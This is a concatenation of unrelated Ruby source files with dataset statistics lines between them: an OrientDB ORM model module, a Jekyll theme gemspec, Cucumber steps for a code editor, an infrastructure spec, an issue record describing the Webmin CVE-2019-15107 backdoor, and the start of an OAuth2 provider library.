# @since 2.0.0
begin
if BSON::Environment.jruby?
require "bson-ruby.jar"
org.bson.NativeService.new.basicLoad(JRuby.runtime)
else
require "bson_native"
end
rescue LoadError => e
$stderr.puts("Failed to load the necessary extensions: #{e.class}: #{e}")
raise
end
| 25.53211 | 77 | 0.727273 |
01dfc4ea893bb8a83108bf73f6e291e3293d6b80 | 19,980 | module ModelClass
require 'stringio'
include OrientSupport::Support
########### CLASS FUNCTIONS ######### SELF ####
######## INITIALIZE A RECORD FROM A CLASS ########
=begin
NamingConvention provides a translation from database-names to class-names.
It can be overwritten to provide different conventions for different classes, eg. Vertexes or edges
and to introduce distinct naming-conventions in different namespaces
To overwrite use
class Model # < ActiveOrient::Model[:: ...]
def self.naming_convention
( conversion code )
end
end
=end
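# Illustrative override sketch (not from the original source): upcase database
# names instead of camelizing them; ref_name is assumed to behave as in the
# default implementation below.
# class Model # < ActiveOrient::Model
#   def self.naming_convention name = nil
#     (name.presence || ref_name).to_s.upcase
#   end
# end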
def naming_convention name=nil
nc = name.present?? name.to_s : ref_name
if namespace_prefix.present?
nc.split(namespace_prefix).last.camelize
else
nc.camelize
end
rescue
nil
end
=begin
Set the namespace_prefix for database-classes.
If a namespace is set by
ActiveOrient::Init.define_namespace { ModuleName }
ActiveOrient translates this to
ModuleName::CamelizedClassName
The database-class becomes
modulename_class_name
If the namespace is set to a class (Object, ActiveOrient::Model ) namespace_prefix returns an empty string.
Override to change its behavior
=end
def namespace_prefix
namespace.is_a?(Class )? '' : namespace.to_s.downcase+'_'
end
=begin
orientdb_class is used to refer to an ActiveOrient::Model object by providing its name
Parameter: name: string or symbol
=end
def orientdb_class name:, superclass: nil # :nodoc: # public method: autoload_class
ActiveOrient.database_classes[name.to_s].presence || ActiveOrient::Model
rescue NoMethodError => e
logger.error { "Error in orientdb_class: is ActiveOrient.database_classes initialized ? \n\n\n" }
logger.error{ e.backtrace.map {|l| " #{l}\n"}.join }
Kernel.exit
end
=begin
setter method to initialise a dummy ActiveOrient::Model class to enable multi-level
access to links and linklists
=end
def link_list *property
property.each do |p|
the_dummy_class = orientdb.allocate_class_in_ruby("dummy_"+p.to_s)
the_dummy_class.ref_name = ref_name + "." + p.to_s
singleton_class.send :define_method, p do
the_dummy_class
end
end
end
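# Usage sketch (class and property names are hypothetical): after
#   Account.link_list :positions
# Account.positions returns a dummy model class whose ref_name is
# "account.positions", so nested links and linklists can be addressed per class.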
=begin
requires the file specified in the model-dir
In fact, the model-files are loaded instead of required.
Thus, even after recreation of a class (Class.delete_class, ORD.create_class classname)
custom methods declared in the model files are present.
If a class is destroyed (i.e. the database class is deleted), the ruby-class and its methods vanish, too.
The directory specified is expanded by the namespace. The parameter itself is the base-dir.
Example:
Namespace: HC
model_dir : 'lib/model'
searched directory: 'lib/model/hc'
ActiveOrient::Model.model_dir is meant to be set to the application dir. It may be a String, Pathname or
an array of strings or pathnames.
The parameter `dir` is used internally and by gems to ensure that basic methods are loaded first.
=end
def require_model_file dir = nil
logger.progname = 'ModelClass#RequireModelFile'
# model-dir can either be a string or an array of string or pathnames
default = [ActiveOrient::Model.model_dir].flatten
# access the default dir's first
the_directories = case dir
when String, Pathname
default.present? ? [dir] + default : [dir]
when Array
default.present? ? dir + default : dir
else
default.present? ? default : []
end.uniq.compact
the_directories.uniq.map do |raw_directory|
the_directory = Pathname( raw_directory )
if File.exists?( the_directory )
model= self.to_s.underscore + ".rb"
filename = the_directory + model
if File.exists?(filename )
if load filename
logger.debug{ "#{filename} successfully loaded" }
self #return_value
else
logger.error{ "#{filename} load error" }
nil #return_value
end
else
logger.debug{ "model-file not present: #{filename} --> skipping" }
nil #return_value
end
else
logger.error{ "Directory #{ the_directory } not present " }
nil #return_value
end
end.compact.present? # return true only if at least one model-file is present
rescue TypeError => e
puts "THE CLASS#require_model_file -> TypeError: #{e.message}"
puts "Working on #{self.to_s} -> #{self.superclass}"
puts "Class_hierarchy: #{orientdb.class_hierarchy.inspect}."
print e.backtrace.join("\n")
raise
#
end
# creates an inherited (derived) class
def create_class *c
orientdb.create_class( *c ){ self }
end
########## CREATE ############
=begin
Universal method to create a new record.
It's overloaded to create specific kinds, eg. edge and vertex and is called only for abstract classes
Example:
V.create_class :test
Test.create string_attribute: 'a string', symbol_attribute: :a_symbol, array_attribute: [34,45,67]
Test.create link_attribute: Test.create( :a_new_attribute => 'new' )
=end
def create **attributes
attributes = attributes.merge :created_at => DateTime.new
result = db.create_record self, attributes: attributes
if result.nil?
logger.error('Model::Class'){ "Table #{refname}: create failed: #{attributes.inspect}" }
elsif block_given?
yield result
else
result # return value
end
end
# returns an OrientSupport::OrientQuery
def query **args
OrientSupport::OrientQuery.new( **( {from: self}.merge args))
end
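# Example (class and attribute are hypothetical), refining the returned query
# object before execution:
#   Account.query(where: { connected: true }).execute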
=begin
Creates or updates records.
Parameter:
- set: A hash of attributes to insert or update unconditionally
- where: A string or hash as condition which should return just one record.
The where-part should be covered by a unique index.
returns the affected record, if the where-condition is set properly.
Otherwise upsert acts as »update« and returns all updated records (as array).
=end
def upsert set: nil, where: , **args
set = where if set.nil?
query( **args.merge( kind: :upsert, set: set, where: where )).execute(reduce: true){|y| y[:$current].reload!}
end
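# Example (class and attributes are hypothetical; assumes a unique index on :account):
#   IB::Account.upsert set: { connected: true }, where: { account: 'U100' }
#   # returns the single matched (or newly created) record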
=begin
Sets a value to certain attributes, overwrites existing entries, creates new attributes if necessary
returns the count of affected records
IB::Account.update! connected: false
IB::Account.update! where: "account containsText 'F'", set:{ connected: false }
# or
IB::Account.update! connected: false, where: "account containsText 'F'"
=end
def update! where: nil , set: {}, **arg
query( kind: :update!, set: set.merge(arg), where: where).execute(reduce: true){|y| y[:count]}
end
alias update_all update!
# same as update!, but returns a list of updated records
def update where: , set: {}, **arg
# In OrientDB V.3 the database only returns the affected rid's
# We have to update the contents manually, this is done in the execute-block
query( kind: :update, set: set.merge(arg), where: where).execute{|y| y[:$current].reload!}
end
=begin
Create a Property in the Schema of the Class and optionally create an automatic index
Examples:
create_property :customer_id, type: :integer, index: :unique
create_property( :name, type: :string ) { :unique }
create_property( :name, type: :string ) { name: 'some_index', on: :automatic, type: :unique }
create_property :in, type: :link, linked_class: V (used by edges)
:call-seq: create_property(field (required),
type: :a_supported_type,
linked_class: nil
supported types:
:bool :double :datetime = :date :float :decimal
:embedded_list = :list :embedded_map = :map :embedded_set = :set
:int :integer :link_list :link_map :link_set
If `:list`, `:map`, `:set`, `:link`, `:link_list`, `:link_map` or `:link_set` is specified
a `linked_class:` parameter can be specified. Argument is the OrientDB-Class-Constant
=end
def create_property field, type: :integer, index: nil, **args
arguments = args.values.map do |y|
if y.is_a?(Class) && ActiveOrient.database_classes.values.include?(y)
y.ref_name
elsif ActiveOrient.database_classes.keys.include?(y.to_s)
y
else
puts ActiveOrient.database_classes.inspect
puts "YY : #{y.to_s} #{y.class}"
raise ArgumentError , "database class #{y.to_s} not allocated"
end
end.compact.join(',')
supported_types = {
:bool => "BOOLEAN",
:double => "DOUBLE",
:datetime => "DATE",
:date => "DATE",
:float => "FLOAT",
:decimal => "DECIMAL",
:embedded_list => "EMBEDDEDLIST",
:list => "EMBEDDEDLIST",
:embedded_map => "EMBEDDEDMAP",
:map => "EMBEDDEDMAP",
:embedded_set => "EMBEDDEDSET",
:set => "EMBEDDEDSET",
:string => "STRING",
:int => "INTEGER",
:integer => "INTEGER",
:link => "LINK",
:link_list => "LINKLIST",
:link_map => "LINKMAP",
:link_set => "LINKSET",
}
## if the »type« argument is a string, it is used unchanged
type = supported_types[type] if type.is_a?(Symbol)
raise ArgumentError , "unsupported type" if type.nil?
s= " CREATE PROPERTY #{ref_name}.#{field} #{type} #{arguments}"
puts s
db.execute { s }
i = block_given? ? yield : index
## supported format of block: index: { name: 'something' , on: :automatic, type: :unique }
## or { name: 'something' , on: :automatic, type: :unique } #
## or { some_name: :unique } # manual index
## or { :unique } # automatic index
if i.is_a? Hash
att= i.key( :index ) ? i.values.first : i
name, on, type = if att.size == 1 && att[:type].nil?
[att.keys.first, field, att.values.first ]
else
[ att[:name] || field , att[:on] || field , att[:type] || :unique ]
end
create_index( name , on: on, type: type)
elsif i.is_a?(Symbol) || i.is_a?(String)
create_index field, type: i
end
# orientdb.create_property self, field, **keyword_arguments, &b
end
# Create more Properties in the Schema of the Class
def create_properties argument_hash, &b
orientdb.create_properties self, argument_hash, &b
end
# Add an Index
#
# Parameters:
# name (string / symbol),
# [ on: :automatic / single Column, Array of Columns,
# [ type: :unique, :nonunique, :dictionary,:fulltext, {other supported index-types} ]]
#
# Default:
# on: :automatic
# type: :unique
#
# Example
#
# ORD.create_vertex_class :pagination
# Pagination.create_property :col1 , type: :string
# Pagination.create_property :col2, type: :integer
# Pagination.create_property :col3, type: :string
# Pagination.create_property :col4, type: :integer
# Pagination.create_index :composite, :on => [:col1, :col2, :col3], type: 'dictionary'
def create_index name, **attributes
orientdb.create_index self, name: name, **attributes
end
# list all Indexes
def indexes
properties[:indexes]
end
def migrate_property property, to: , linked_class: nil, via: 'tzr983'
if linked_class.nil?
create_property via, type: to
else
create_property via, type: to, linked_class: linked_class
end
# my_count = query.kind(:update!).set( "#{via} = #{property} ").execute(reduce: true){|c| c[:count]}
# logger.info{" migrate property: #{count} records prosessed"}
all.each{ |r| r.update set:{ via => r[property.to_sym] }}
nullify = query.kind(:update!).set( property: nil ).execute(reduce: true){|c| c[:count]}
# raise "migrate property: count of erased items( #{nullify} differs from total count (#{my_count}) " if nullify != my_count
db.execute{" alter property #{ref_name}.#{via} name '#{property}' "}
logger.info{ "successfully migrated #{property} to #{:to} " }
end
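# Usage sketch (Account and Customer are illustrative assumptions): converts the
# plain »customer« property into a LINK property while keeping its name.
#   Account.migrate_property :customer, to: :link, linked_class: Customer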
########## GET ###############
def classname # :nodoc: #
ref_name
end
# get elements by rid
def get rid
if @excluded.blank?
db.get_record(rid)
else
db.execute{ "select expand( @this.exclude( #{@excluded.map(&:to_or).join(",")})) from #{rid} "}
end
end
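# Sketch (the rid is an illustrative value):
#   TestClass.get '#30:1'     # => the record identified by this rid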
# get all the elements of the class
def all
query.execute
end
# get the first element of the class
def first **args
query( **( { order: "@rid" , limit: 1 }.merge args)).execute(reduce: true)
end
# db.get_records(from: self, where: where, limit: 1).pop
#end
# get the last element of the class
def last **args
query( **( { order: {"@rid" => 'desc'} , limit: 1 }.merge args)).execute(reduce: true)
end
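# Sketch: »first« and »last« accept the same keyword arguments as »query«,
# e.g. a where-clause (TestClass and its attribute are illustrative assumptions):
#   TestClass.first where: { symbol: 'TLS' }
#   TestClass.last  where: { symbol: 'TLS' }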
# Returns the count of the elements in the class
#
# Examples
# TestClass.count where: 'last_access is NULL' # only records where 'last_access' is not set
# TestClass.count # all records
def count **args
query( **( { projection: 'COUNT(*)' }.merge args )).execute(reduce: true){|x| x[:"COUNT(*)"]}
end
# Get the properties of the class
def properties
object = orientdb.get_class_properties self
{:properties => object['properties'], :indexes => object['indexes']}
end
alias get_class_properties properties
# Print the properties of the class
def print_properties
orientdb.print_class_properties self
end
=begin
»GetRecords« uses the REST-Interface to query the database. The alternative »QueryDatabase« submits
the query via Execute.
Both methods rely on OrientSupport::OrientQuery and its capacity to support complex query-builds.
The method requires a hash of arguments. The following keys are supported:
*projection:*
SQL-Queries use »select« to specify a projection (i.e. `select sum(a), b+5 as z from class where ...`)
In Ruby »select« is a method of Enumerable. To specify what to »select« from in the query-string
we use »projection«, which accepts different arguments:
projection: a_string --> inserts the string as it appears
projection: an OrientSupport::OrientQuery-Object --> performs a sub-query and uses the result for further querying through the given parameters.
projection: [a, b, c] --> "a, b, c" (inserts a comma-separated list)
projection: {a: b, "sum(x)" => f} --> "a as b, sum(x) as f" (renames properties and uses functions)
*distinct:*
Constructs a query like »select distinct(property) [as property] from ...«
distinct: :property --> the result is mapped to the property »distinct«.
distinct: [:property] --> the result replaces the property
distinct: {property: :some_name} --> the result is mapped to ModelInstance.some_name
*order:*
Sorts the result-set. If new properties were introduced via select:, distinct: etc., sorting takes place on these properties.
order: :property                                 (sorts ascending on a single property)
order: {property_a: :asc, property_b: :desc}     (explicit sort direction per property)
order: [property_a, property_b, ...]             (sort direction is 'asc')
Further supported Parameter:
group_by
skip
limit
unwind
see orientdb- documentation (https://orientdb.com/docs/last/SQL-Query.html)
*query:*
Instead of providing the parameters to »get_records« directly, an OrientSupport::OrientQuery can be built and
tested prior to the method call. The OrientQuery object is then passed in via the query: parameter, i.e.
q = OrientSupport::OrientQuery.new
ORD.create_class :test_model
q.from TestModel
q.where name: 'Thomas'
count = TestModel.count query: q
q.limit 10
0.step(count,10) do |x|
q.skip = x
puts TestModel.get_documents(query: q).map{|x| x.address }.join("\t")
end
prints a Table with 10 columns.
=end
def get_records **args
db.get_records(from: self, **args){self}
end
alias get_documents get_records
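# Condensed sketch of the parameters described above (TestModel and its
# properties are illustrative assumptions):
#   TestModel.get_records projection: { "sum(amount)" => :total },
#                         where:      { exchange: 'ASX' },
#                         order:      { created_at: :desc },
#                         limit:      10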
=begin
Performs a query on the Class and returns an Array of ActiveOrient::Model records.
Fall-back method, is overloaded by Vertex.where
Is aliased by »custom_where«.
Example:
Log.where priority: 'high'
--> submitted database-request: query/hc_database/sql/select from Log where priority = 'high'/-1
=> [ #<Log:0x0000000480f7d8 @metadata={ ... }, ...
Multiple arguments are joined via "and", e.g.:
Aktie.where symbol: 'TLS', exchange: 'ASX'
---> select from aktie where symbol = 'TLS' and exchange = 'ASX'
=end
def where *attributes
q= OrientSupport::OrientQuery.new where: attributes
query_database( q)
end
alias custom_where where
=begin
QueryDatabase sends the Query directly to the database.
The query returns a hash if a result set is expected
select {something} as {result} (...)
leads to
[ { :{result} => {result of query} } ]
It can be modified further by passing a block, ie.
q = OrientSupport::OrientQuery.new( from: :base )
.projection( 'first_list[5].second_list[9] as second_list' )
.where( label: 9 )
q.to_s => 'select first_list[5].second_list[9] as second_list from base where label = 9 '
second_list = Base.query_database( q ){|x| x[:second_list]}.first
The query returns (a list of) documents of type ActiveOrient::Model if a document is queried i.e.
q = OrientSupport::OrientQuery.new from: :base
q.projection 'expand( first_list[5].second_list[9])' #note: no 'as' statement
result2 = Base.query_database( q ).first
=> #<SecondList:0x000000000284e840 @metadata={}, @d=nil, @attributes={:zobel=>9, "@class"=>"second_list"}>
query_database is used on model-level and submits
select (...) from class
#query performs queries on the instance-level and submits
select (...) from #{a}:{b}
=end
def query_database query, set_from: true
# note: the set_from parameter is not used anymore
query.from self if query.is_a?(OrientSupport::OrientQuery) && query.from.nil?
result = db.execute{ query.to_s }
result = if block_given?
result.is_a?(Array) ? result.map{|x| yield(x) } : yield(result)
else
result
end
if result.is_a? Array
OrientSupport::Array.new work_on: self, work_with: result
else
result
end # return value
end
########### DELETE ###############
# Delete a property from the class
def delete_property field
orientdb.delete_property self, field
end
# Delete record(s) specified by their rid's
def delete_record *rid
db.delete_record rid
end
alias delete_document delete_record
# Query the database and delete the records of the resultset
#
# Returns the count of datasets affected
def delete_records where: {} , **args
if args[:all] == true
where = {}
else
where.merge!(args) if where.is_a?(Hash)
return 0 if where.empty?
end
orientdb.delete_records( self, where: where ).count
end
alias delete delete_records
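# Usage sketch (TestClass and its attribute are illustrative assumptions); the
# guard above requires either a where-clause or an explicit all: true.
#   TestClass.delete_records where: { priority: 'low' }   # => number of deleted records
#   TestClass.delete_records all: true                    # deletes every record of the class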
##################### EXPERIMENT #################
=begin
Suppose that you created a graph where the vertex-class Month is connected with
the vertex-class Day by the edge TIMEOF.
Suppose we want to find all the days in the first month and in the third month.
Usually we would do it in the following way:
ORD.create_class :month
(.. put some records into Month ... )
firstmonth = Month.first
thirdmonth = Month.all[2]
days_firstmonth = firstmonth.out_TIMEOF.map{|x| x.in}
days_thirdmonth = thirdmonth.out_TIMEOF.map{|x| x.in}
However we can obtain the same result with the following command
Month.add_edge_link name: "days", direction: "out", edge: TIME_OF
firstmonth = month.first
thirdmonth = month.all[2]
days_firstmonth = firstmonth.days
days_thirdmonth = thirdmonth.days
To get their value you can do:
thirdmonth.days.value
=end
def add_edge_link name:, direction: :out, edge:
dir = direction.to_s == "out" ? :out : :in
define_method(name.to_sym) do
return self["#{dir}_#{edge.classname}"].map{|x| x["in"]}
end
end
=begin
See http://orientdb.com/docs/2.1/SQL-Alter-Property.html
=end
def alter_property property, attribute: "DEFAULT", alteration: # :nodoc:
orientdb.alter_property self, property: property, attribute: attribute, alteration: alteration
end
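# Usage sketch (Account and the attribute value are illustrative assumptions; any
# attribute listed in the OrientDB ALTER PROPERTY documentation should work):
#   Account.alter_property :symbol, attribute: 'MANDATORY', alteration: true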
end
| 30.364742 | 147 | 0.670871 |
bb50ce58658ccf310fdc73192d16db73a362ca64 | 1,294 | # -*- encoding: utf-8 -*-
# stub: jekyll-theme-leap-day 0.1.0 ruby lib
Gem::Specification.new do |s|
s.name = "jekyll-theme-leap-day".freeze
s.version = "0.1.0"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["Matt Graham".freeze, "GitHub, Inc.".freeze]
s.date = "2017-08-14"
s.email = ["[email protected]".freeze]
s.homepage = "https://github.com/pages-themes/leap-day".freeze
s.licenses = ["CC0-1.0".freeze]
s.rubygems_version = "2.6.13".freeze
s.summary = "Leap Day is a Jekyll theme for GitHub Pages".freeze
s.installed_by_version = "2.6.13" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_runtime_dependency(%q<jekyll>.freeze, ["~> 3.5"])
s.add_runtime_dependency(%q<jekyll-seo-tag>.freeze, ["~> 2.0"])
else
s.add_dependency(%q<jekyll>.freeze, ["~> 3.5"])
s.add_dependency(%q<jekyll-seo-tag>.freeze, ["~> 2.0"])
end
else
s.add_dependency(%q<jekyll>.freeze, ["~> 3.5"])
s.add_dependency(%q<jekyll-seo-tag>.freeze, ["~> 2.0"])
end
end
| 36.971429 | 112 | 0.661515 |
e989283cc3dc76d650c360e2f65f63d219e45fd1 | 565 | require 'spec_helper'
describe 'Private zone' do
let(:private_domain_name) { vars.private_domain_name }
subject { route53_hosted_zone("#{private_domain_name}.") }
it { should exist }
it 'outputs the zone id' do
expect(subject.id).to(include(output_for(:harness, 'private_zone_id')))
end
it 'outputs the name servers' do
expected_name_servers =
output_for(:harness, 'private_zone_name_servers')
.join("\n")
expect(subject)
.to(have_record_set(subject.name)
.ns(expected_name_servers))
end
end | 24.565217 | 75 | 0.679646 |
91bb64b75fa0522623c0b97a10bdb55fddc915bc | 3,844 | And(/^I wait to see Droplet text mode$/) do
wait = Selenium::WebDriver::Wait.new(timeout: 10)
wait.until {@browser.execute_script("return parseInt($('.droplet-ace').css('left')) > 0;")}
end
And(/^I wait to see Droplet block mode$/) do
wait = Selenium::WebDriver::Wait.new(timeout: 10)
wait.until {@browser.execute_script("return $('.droplet-gutter > div').css('display') === 'block';")}
end
And(/^the Droplet ACE text is "([^"]*)"$/) do |expected_text|
# Let us expect newlines in the editor
expected_text.gsub! '\n', "\n"
actual_text = @browser.execute_script("return __TestInterface.getDropletContents();")
expect(actual_text).to eq(expected_text)
end
And(/^the Droplet ACE text is '([^']*)'$/) do |expected_text|
# Let us expect newlines in the editor
expected_text.gsub! '\n', "\n"
actual_text = @browser.execute_script("return __TestInterface.getDropletContents();")
expect(actual_text).to eq(expected_text)
end
And(/^no Tooltipster tooltip is visible$/) do
wait = Selenium::WebDriver::Wait.new(timeout: 10)
wait.until {[email protected]_script("return $('.tooltipster-base').is(':visible');")}
end
And(/^there is a Tooltipster tooltip with text "([^"]*)"$/) do |tooltip_text|
wait = Selenium::WebDriver::Wait.new(timeout: 10)
wait.until {@browser.execute_script("return $('.tooltipster-content :contains(#{tooltip_text})').length > 0;")}
end
# This doesn't work in IE or on mobile yet, not sure why.
When /^I drag droplet block "([^"]*)" to line (\d+)$/ do |block_name, line_number|
# Droplet with SVG will trash the block if any part of it overlaps the gutter.
extra_dx = 5
code = %{
var block = $(".droplet-palette-canvas text:contains(#{block_name})");
var gutterLine = $(".droplet-gutter-line").filter(function (index) { return $(this).text() === "#{line_number}"; });
var drag_dx = gutterLine.offset().left + gutterLine.outerWidth() - block.offset().left + #{extra_dx};
var drag_dy = gutterLine.offset().top - block.offset().top;
block.simulate('drag', {
handle: 'center',
dx: drag_dx,
dy: drag_dy,
moves: 5
});
}
@browser.execute_script code
end
When /^I click droplet gutter line (\d+)$/ do |line|
code = %{
var gutterLine = $(".droplet-gutter-line").filter(function (index) { return $(this).text() === "#{line}"; });
var x = gutterLine.offset().left + 5;
var y = gutterLine.offset().top + 5;
gutterLine.simulate('mousedown', {
clientX: x,
clientY: y,
});
}
@browser.execute_script code
end
When /^I ensure droplet is in text mode$/ do
steps 'And I wait to see "#show-code-header"'
button_text = @browser.execute_script("return $('#show-code-header').text()")
if button_text == 'Show Text'
steps <<-STEPS
Then I press "show-code-header"
And I wait to see Droplet text mode
STEPS
end
end
When /^I ensure droplet is in block mode$/ do
steps 'And I wait to see "#show-code-header"'
button_text = @browser.execute_script("return $('#show-code-header').text()")
if button_text == 'Show Blocks'
steps <<-STEPS
Then I press "show-code-header"
And I wait to see Droplet block mode
STEPS
end
end
When /^I add code "([^"]+)" to ace editor$/ do |code|
steps 'I ensure droplet is in text mode'
add_code_to_editor(code)
end
def add_code_to_editor(code)
script =
"var aceEditor = __TestInterface.getDroplet().aceEditor;\n" \
"aceEditor.textInput.focus();\n" \
"aceEditor.onTextInput(\"#{code}\");\n"
@browser.execute_script(script)
end
When /^ace editor code is equal to "([^"]+)"$/ do |expected_code|
actual_code = get_ace_editor_code
expect(actual_code).to eq(expected_code)
end
def get_ace_editor_code
script = 'return __TestInterface.getDroplet().aceEditor.getValue().trim();'
@browser.execute_script(script)
end
| 33.719298 | 120 | 0.668054 |
014c556c2b1391bee28ae84e9b16163cd6557bcd | 751 | Rails.application.routes.draw do
mount Rswag::Ui::Engine => '/api-docs'
mount Rswag::Api::Engine => '/api-docs'
devise_for :users
root "users#index"
resources :users, only: [:index, :show] do
resources :posts, only: [:index, :show, :destroy] do
resources :comments, only: [:create, :destroy]
resources :likes, only: [:create]
end
end
resources :posts, only: [:new, :create]
namespace "api", defaults: { format: :json } do
post 'login', to: 'authentication#authenticate'
post 'signup', to: 'users#create'
resources :users, only:[:index, :show, :create] do
resources :posts, only:[:index, :show] do
resources :comments, only:[:index, :create]
end
end
end
end
| 30.04 | 56 | 0.617843 |
39b1a8b274499c32ca02afd2e503d73ce01bb0c4 | 2,139 | class Libsvm < Formula
desc "Library for support vector machines"
homepage "https://www.csie.ntu.edu.tw/~cjlin/libsvm/"
# Upstream deletes old downloads, so we need to mirror it ourselves
url "https://www.csie.ntu.edu.tw/~cjlin/libsvm/libsvm-3.24.tar.gz"
mirror "https://dl.bintray.com/homebrew/mirror/libsvm-3.24.tar.gz"
sha256 "d5881a201a4e6227bf8e2f5de7d6eeaef481c6c2bb9540aeca547737844f8696"
license "BSD-3-Clause"
livecheck do
url :homepage
regex(/The current release \(Version v?(\d+(?:\.\d+)+)[, )]/i)
end
bottle do
cellar :any
sha256 "da8cea69e489c678a06f28ba6032a8f3f8f899ac344741bd4b1090da8e33eafe" => :big_sur
sha256 "8dded17ad2e22342ae25d392d5e4d9776572f8b5081e62064e97c027f8c481e6" => :catalina
sha256 "4db9a3e77edfda475ca8bdcad82ce1443ed50df41b28b59d726b1fa81944e2c7" => :mojave
sha256 "5d4ee9cec3a0048ef8abd328022fa3752c3dc2ead9d86d9995b79558700dbbd2" => :high_sierra
sha256 "93892583011e9379e0378425f9b4be778919cb4df18c7b46a59903208732bf5e" => :x86_64_linux
end
def install
system "make", "CFLAGS=#{ENV.cflags} -fPIC"
system "make", "lib"
bin.install "svm-scale", "svm-train", "svm-predict"
if OS.mac?
lib.install "libsvm.so.2" => "libsvm.2.dylib"
lib.install_symlink "libsvm.2.dylib" => "libsvm.dylib"
MachO::Tools.change_dylib_id("#{lib}/libsvm.2.dylib", "#{lib}/libsvm.2.dylib")
else
lib.install "libsvm.so.2"
lib.install_symlink "libsvm.so.2" => "libsvm.so"
end
include.install "svm.h"
end
test do
(testpath/"train_classification.txt").write <<~EOS
+1 201:1.2 3148:1.8 3983:1 4882:1
-1 874:0.3 3652:1.1 3963:1 6179:1
+1 1168:1.2 3318:1.2 3938:1.8 4481:1
+1 350:1 3082:1.5 3965:1 6122:0.2
-1 99:1 3057:1 3957:1 5838:0.3
EOS
(testpath/"train_regression.txt").write <<~EOS
0.23 201:1.2 3148:1.8 3983:1 4882:1
0.33 874:0.3 3652:1.1 3963:1 6179:1
-0.12 1168:1.2 3318:1.2 3938:1.8 4481:1
EOS
system "#{bin}/svm-train", "-s", "0", "train_classification.txt"
system "#{bin}/svm-train", "-s", "3", "train_regression.txt"
end
end
| 36.254237 | 94 | 0.684432 |
2822914265d760360b50121e591d990d557920f3 | 1,134 | module Intrigue
module Issue
class VulnerableWebminInstall < BaseIssue
def self.generate(instance_details={})
{
name: "vulnerability_webmin_cve_2019_15107",
pretty_name: "Vulnerable Webmin Password Reset (CVE-2019-15107)",
identifiers: [
{ type: "CVE", name: "CVE-2019-15107" }
],
severity: 1,
status: "potential",
category: "vulnerability",
description: "The vulnerability was secretly planted by an unknown hacker who successfully managed to inject a BACKDOOR at some point in its build infrastructure that surprisingly persisted into various releases of Webmin (1.882 through 1.921) and eventually remained hidden for over a year.",
remediation: "Update the webmin installation",
affected_software: [
{ :vendor => "Webmin", :product => "Webmin"},
],
references: [
{ type: "description", uri: "https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html" } ,
],
}.merge!(instance_details)
end
end
end
end
| 35.4375 | 301 | 0.641975 |
e25f7f8d02645fe547d826540933ba91029fe6d7 | 395 | cask :v1 => 'the-unarchiver' do
version '3.9.1'
sha256 '4911c332df7f4bb23877652700e845fe097b793ae37450948319398009e923a3'
# googlecode.com is the official download host per the vendor homepage
url "https://theunarchiver.googlecode.com/files/TheUnarchiver#{version}_legacy.zip"
name 'The Unarchiver'
homepage 'http://unarchiver.c3.cx/'
license :oss
app 'The Unarchiver.app'
end
| 30.384615 | 85 | 0.767089 |
082b77772f7368d86c356c91299aef46a6ff6aae | 363 | require "bundler/setup"
require "top/ico"
RSpec.configure do |config|
# Enable flags like --only-failures and --next-failure
config.example_status_persistence_file_path = ".rspec_status"
# Disable RSpec exposing methods globally on `Module` and `main`
config.disable_monkey_patching!
config.expect_with :rspec do |c|
c.syntax = :expect
end
end
| 24.2 | 66 | 0.749311 |
edc00f7bde5498705a2d5ec5668fbb77c70cfab9 | 3,972 | require 'base64'
require 'bcrypt'
require 'cgi'
require 'digest/sha1'
require 'json'
require 'logger'
require 'rack'
begin
require 'securerandom'
rescue LoadError
end
module Songkick
module OAuth2
ROOT = File.expand_path(File.dirname(__FILE__) + '/..')
TOKEN_SIZE = 160
autoload :Model, ROOT + '/oauth2/model'
autoload :Router, ROOT + '/oauth2/router'
autoload :Schema, ROOT + '/oauth2/schema'
def self.random_string
if defined? SecureRandom
SecureRandom.hex(TOKEN_SIZE / 8).to_i(16).to_s(36)
else
rand(2 ** TOKEN_SIZE).to_s(36)
end
end
def self.generate_id(&predicate)
id = random_string
id = random_string until predicate.call(id)
id
end
def self.hashify(token)
return nil unless String === token
Digest::SHA1.hexdigest(token)
end
ACCESS_TOKEN = 'access_token'
ASSERTION = 'assertion'
ASSERTION_TYPE = 'assertion_type'
AUTHORIZATION_CODE = 'authorization_code'
CLIENT_ID = 'client_id'
CLIENT_SECRET = 'client_secret'
CODE = 'code'
CODE_AND_TOKEN = 'code_and_token'
DURATION = 'duration'
ERROR = 'error'
ERROR_DESCRIPTION = 'error_description'
EXPIRES_IN = 'expires_in'
GRANT_TYPE = 'grant_type'
OAUTH_TOKEN = 'oauth_token'
PASSWORD = 'password'
REDIRECT_URI = 'redirect_uri'
REFRESH_TOKEN = 'refresh_token'
RESPONSE_TYPE = 'response_type'
SCOPE = 'scope'
STATE = 'state'
TOKEN = 'token'
USERNAME = 'username'
INVALID_REQUEST = 'invalid_request'
UNSUPPORTED_RESPONSE = 'unsupported_response_type'
REDIRECT_MISMATCH = 'redirect_uri_mismatch'
UNSUPPORTED_GRANT_TYPE = 'unsupported_grant_type'
INVALID_GRANT = 'invalid_grant'
INVALID_CLIENT = 'invalid_client'
UNAUTHORIZED_CLIENT = 'unauthorized_client'
INVALID_SCOPE = 'invalid_scope'
INVALID_TOKEN = 'invalid_token'
EXPIRED_TOKEN = 'expired_token'
INSUFFICIENT_SCOPE = 'insufficient_scope'
ACCESS_DENIED = 'access_denied'
class Provider
EXPIRY_TIME = 3600
autoload :Authorization, ROOT + '/oauth2/provider/authorization'
autoload :Exchange, ROOT + '/oauth2/provider/exchange'
autoload :AccessToken, ROOT + '/oauth2/provider/access_token'
autoload :Error, ROOT + '/oauth2/provider/error'
class << self
attr_accessor :realm, :enforce_ssl
end
def self.clear_assertion_handlers!
@password_handler = nil
@assertion_handlers = {}
@assertion_filters = []
end
clear_assertion_handlers!
def self.handle_passwords(&block)
@password_handler = block
end
def self.handle_password(client, username, password, scopes)
return nil unless @password_handler
@password_handler.call(client, username, password, scopes)
end
def self.filter_assertions(&filter)
@assertion_filters.push(filter)
end
def self.handle_assertions(assertion_type, &handler)
@assertion_handlers[assertion_type] = handler
end
def self.handle_assertion(client, assertion, scopes)
return nil unless @assertion_filters.all? { |f| f.call(client) }
handler = @assertion_handlers[assertion.type]
handler ? handler.call(client, assertion.value, scopes) : nil
end
def self.parse(*args)
Router.parse(*args)
end
def self.access_token(*args)
